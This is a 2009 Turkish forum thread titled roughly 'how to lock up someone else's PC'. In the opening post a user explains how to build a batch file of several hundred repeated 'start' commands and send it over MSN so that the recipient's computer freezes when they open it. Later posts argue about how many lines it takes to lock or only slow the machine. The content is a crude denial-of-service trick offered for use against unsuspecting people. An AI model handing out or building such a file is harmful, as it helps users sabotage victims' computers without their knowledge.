Bay_Bela Padişah
Mesaj Sayısı : 45 Yaş : 29 Nerden : Tuzla,Kadıköy,istanbul Kayıt tarihi : 19/02/09
| Konu: karşı pc nasl kitlenir Salı Şub. 24, 2009 9:45 pm | |
| Kod: start start start start start start start start start start Şimdi bunlar ne diceksiniz ... Bi tane yeni metin belgesi (.txt dosyası) açın sonra BUNLARDAN (start lardan) 800 900 Tane kopyalayın çünkü kilitlemek istiyosanız bu şart !!! Sonra bu yeni metin belgesini kaydedin. daha sonra kaydetiğiniz bu yeni metin belgesinin.txt olan uzantısını .bat olarak farklı kaydetdin. şimdi bunu msn den kime istiyorsanız gönderin. alan kişi gönderdiğiniz dosyayı açınca pc si kilitlenecektir. not: .bat olarak değiştirdikten sonra kendi makinanızda açmayın. | |
|
Bay_Bela Padişah
Mesaj Sayısı : 45 Yaş : 29 Nerden : Tuzla,Kadıköy,istanbul Kayıt tarihi : 19/02/09
| Konu: Geri: karşı pc nasl kitlenir Salı Şub. 24, 2009 9:50 pm | |
| | |
|
#13 Or General
Mesaj Sayısı : 71 Yaş : 29 Nerden : İstanbul Kayıt tarihi : 19/02/09
| Konu: Geri: karşı pc nasl kitlenir Perş. Şub. 26, 2009 6:52 pm | |
| sen suekli bana karşı olmak zorundamısın ya
farkındaysan ben 1 tane start yazın dedim
o bilgisayarın 1 kb ina bile zarar vermez.
yollama anında güçlenir.bu işler o kadar basit deil.
benim yaptıım yavaşlatır seninki kitler
çok kucuk fark dediin bu olmalı
diilse bilmiyorum ... | |
|
Bay_Bela Padişah
| Konu: Geri: karşı pc nasl kitlenir Cuma Mart 20, 2009 11:43 am | |
| hayr benim küçük ve ahmak dostum yoqtur seninle sorunum aziz biriyimdir ama kızdırırsan suratına osururum...xD
aradaki fark yavaşlatmaq deil üstelik 100 tane yazarsan formatlar kitlemez 50 ye kadar sınır vardır kitlemede
senin yaptıın hata yanlış i açılım ve yollama yöntemi.. | |
|